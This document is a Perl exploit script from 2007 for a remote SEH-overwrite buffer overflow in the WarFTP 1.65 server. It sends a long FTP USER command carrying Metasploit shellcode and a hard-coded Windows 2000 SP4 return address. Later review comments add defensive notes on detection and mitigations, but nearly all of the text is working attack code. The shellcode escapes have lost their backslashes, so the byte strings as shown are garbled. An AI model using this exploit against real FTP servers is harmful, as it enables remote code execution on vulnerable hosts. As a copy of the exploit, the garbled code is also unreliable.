warftp-2.txt
Posted on 20 March 2007
# ===============================================================================================
# WarFTP 1.65 (USER) Remote Buffer Overflow SEH overflow Exploit
# By Umesh Wanve
# ===============================================================================================
#
# Date : 15-03-2007
#
# Tested on Windows 2000 SP4 Server English
#           Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
#
# Well I used different technique here. Rather than overwriting EIP, I used SEH handler overwrite
# method. Preety simple.
#
# Stack ---> buffer              === AAAAA.........
#              |
#            Pointer to next SEH === Short Jump to Hellcode
#              |
#            SEH Handler         === Pop, Pop, Ret (ws2help.dll win2000 sp4)
#              |
#            NOP Sled            === Nop Sled
#              |
#            Hellcode            === Hell.........
#
#
#
#
# P.S: This was written for educational purpose. Use it at your own risk.Author will be not be
# responsible for any damage.
#
# Always Thanks to Metasploit.
#
#==================================================================================================
#
# NOTE(review): Defender-oriented reading of this listing.
#   - The whole payload travels in the argument of a single FTP USER command (see the
#     concatenation below): "USER " + 485 filler bytes + 4 + 80 + 4 + 4 + 10 + shellcode
#     (330 bytes per the generator comment) + 10 + terminator, i.e. roughly 930 bytes on
#     the wire. Legitimate usernames are tens of bytes at most, so a USER argument of
#     several hundred bytes, or one containing non-printable bytes (the 0x90 sled), is a
#     straightforward network/IDS detection point for this class of attack.
#   - The SEH-handler address is hard-coded to a Windows 2000 SP4 ws2help.dll (author's
#     comment below), so the script is tied to that exact OS build. The technique it relies
#     on (overwriting the SEH record and returning through a pop/pop/ret) is what later
#     Windows mitigations such as SafeSEH, SEHOP and DEP were introduced to break; the
#     durable fix is patching/retiring WarFTP 1.65 and keeping FTP control ports off
#     untrusted networks.
#   - Code quality: `use strict` is commented out, and $socket / $exploit are never
#     declared, so the script only runs because strictures are off. The target host is
#     taken from $ARGV[0] unvalidated.

#!/usr/bin/perl
use IO::Socket;
#use strict;

# win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
# (Payload as published: it launches calc.exe, i.e. a proof-of-execution marker rather
# than a persistence or remote-control payload.)
my($shellcode)=
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49".
"x49x49x49x49x49x49x49x37x49x49x49x49x51x5ax6ax42".
"x58x50x30x41x31x42x41x6bx41x41x52x32x41x42x41x32".
"x42x41x30x42x41x58x50x38x41x42x75x38x69x79x6cx4a".
"x48x67x34x47x70x77x70x53x30x6ex6bx67x35x45x6cx4c".
"x4bx73x4cx74x45x31x68x54x41x68x6fx6cx4bx70x4fx57".
"x68x6ex6bx71x4fx45x70x65x51x5ax4bx67x39x4cx4bx50".
"x34x4cx4bx77x71x68x6ex75x61x4bx70x4ex79x6ex4cx4d".
"x54x4bx70x72x54x65x57x69x51x49x5ax46x6dx37x71x6f".
"x32x4ax4bx58x74x77x4bx41x44x44x64x35x54x72x55x7a".
"x45x6cx4bx53x6fx51x34x37x71x48x6bx51x76x4cx4bx76".
"x6cx50x4bx6ex6bx71x4fx67x6cx37x71x68x6bx4cx4bx65".
"x4cx4cx4bx64x41x58x6bx4bx39x53x6cx75x74x46x64x78".
"x43x74x71x49x50x30x64x6ex6bx43x70x44x70x4cx45x4f".
"x30x41x68x44x4cx4ex6bx63x70x44x4cx6ex6bx30x70x65".
"x4cx4ex4dx6cx4bx30x68x75x58x7ax4bx35x59x4cx4bx4d".
"x50x58x30x37x70x47x70x77x70x6cx4bx65x38x57x4cx31".
"x4fx66x51x48x76x65x30x70x56x4dx59x4ax58x6ex63x69".
"x50x31x6bx76x30x55x38x5ax50x4ex6ax36x64x63x6fx61".
"x78x6ax38x4bx4ex6cx4ax54x4ex76x37x6bx4fx4bx57x70".
"x63x51x71x32x4cx52x43x37x70x42";

# Overwrites the "next SEH record" pointer; the author uses it as a short forward jump
# over the handler address into the NOP sled.
my($pointer_to_next_seh)="xebx06x90x90";   # Short Jump

# Overwrites the SEH handler pointer with a pop/pop/ret gadget address. Hard-coded for
# ws2help.dll on Windows 2000 SP4 only (see header) -- this is what makes the script
# build-specific and what SafeSEH/SEHOP-style mitigations are designed to refuse.
my($seh_handler)="xa9x11x02x75";            #pop, pop, ret #(ws2help.dll win2000 sp4)

# Connect to the FTP control port of the host given on the command line. Note that the
# banner is not read before sending USER; presumably the server accepts the command
# regardless -- not verifiable from this listing.
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "21", Proto => "TCP"))
{
    # Layout mirrors the stack diagram in the header: command, filler, overwritten return
    # address, padding, SEH record (next-pointer + handler), NOP sled, payload, trailer.
    $exploit = "USER ".                  #Vulnerable Command
               ("A"x485).                #Buffer
               "BBBB".                   #EIP Overwrites here :)
               ("x90" x 80).             #Garbage
               $pointer_to_next_seh.
               $seh_handler.
               ("x90" x 10).
               $shellcode.               #payload (calc.exe per the generator comment)
               ("x90" x 10).
               " ";
    print $socket $exploit;
    # Presumably gives the server time to process the command before the connection is
    # torn down; the author does not say.
    sleep(1);
    close($socket);
}
else
{
    # Connection failure; the underlying error ($@ from IO::Socket) is not reported.
    print "Cannot connect to $ARGV[0]:21 ";
}